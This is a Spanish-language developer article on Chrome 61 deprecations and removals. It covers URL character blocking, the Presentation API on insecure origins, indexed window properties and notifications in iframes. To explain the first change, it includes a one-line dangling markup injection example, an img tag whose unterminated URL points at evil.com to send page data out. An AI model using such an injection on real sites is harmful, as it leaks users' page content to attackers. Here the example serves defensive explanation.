En casi todas las versiones de Chrome, vemos una cantidad significativa de actualizaciones y mejoras en el producto, su rendimiento y también en las capacidades de la plataforma web. En este artículo, se describen las bajas y las eliminaciones de Chrome 61, que está en versión beta desde el 3 de agosto. Esta lista está sujeta a cambios en cualquier momento.
Seguridad y privacidad
Bloquea los recursos cuyas URLs contienen caracteres "n" y "<"
Existe un tipo de hackeo llamado inyección de lenguaje de marcado colgante en el que se usa una URL truncada para enviar datos a un extremo externo. Por ejemplo, considera una página que contiene <img src='https://evil.com/?
. Como la URL no tiene comillas de cierre, los navegadores leerán hasta la siguiente comilla que aparezca y tratarán los caracteres encerrados como si fueran una sola URL.
Chrome 61 mitiga esta vulnerabilidad restringiendo los conjuntos de caracteres permitidos en los atributos href
y src
. Específicamente, Chrome dejará de procesar URLs cuando encuentre caracteres de línea nueva (\n
) y caracteres de menor que (<
).
Los desarrolladores que tengan un caso de uso legítimo para el salto de línea y menos de caracteres en una URL deben escapar estos caracteres.
Intent to Remove | Chromestatus Tracker | Chromium Bug
Baja y quita la API de Presentation en contextos no seguros
Se descubrió que, en orígenes inseguros, la API de Presentation se puede usar como un vector de hackeo en orígenes inseguros. Dado que las pantallas no tienen barras de direcciones, la API se puede usar para falsificar contenido. También es posible extraer datos de una presentación en ejecución.
En línea con la intención de Blink de quitar funciones potentes en orígenes inseguros, planeamos dar de baja y quitar la compatibilidad con la API de Presentation en contextos inseguros. A partir de Chrome 61, PresentationRequest.start()
ya no funcionará en orígenes inseguros.
Intent to Remove | Chromestatus Tracker | Chromium Bug
JavaScript
No se permite definir propiedades indexadas en Windows.
Anteriormente, algunos navegadores permitían tareas de JavaScript como las siguientes:
window[0] = 1;
En las notas de la especificación actual de HTML, se indica que esto es una infracción explícita de la especificación de JavaScript. Por lo tanto, esta función se quitó en Chrome 61. A partir de febrero de 2016, Firefox ya cumple con la política.
Se quitó el uso de notificaciones de iframes no seguros.
Las solicitudes de permisos de iframes pueden confundir a los usuarios, ya que es difícil distinguir entre el origen de la página contenedora y el del iframe que realiza la solicitud. Cuando el alcance de las solicitudes no es claro, es difícil para los usuarios juzgar si otorgar o denegar el permiso.
Si no se permiten las notificaciones en los iframes, también se alinearán los requisitos del permiso de notificación con los de las notificaciones push, lo que facilitará la interacción de los desarrolladores.
Los desarrolladores que necesiten esta funcionalidad pueden abrir una ventana nueva para solicitar el permiso de notificación.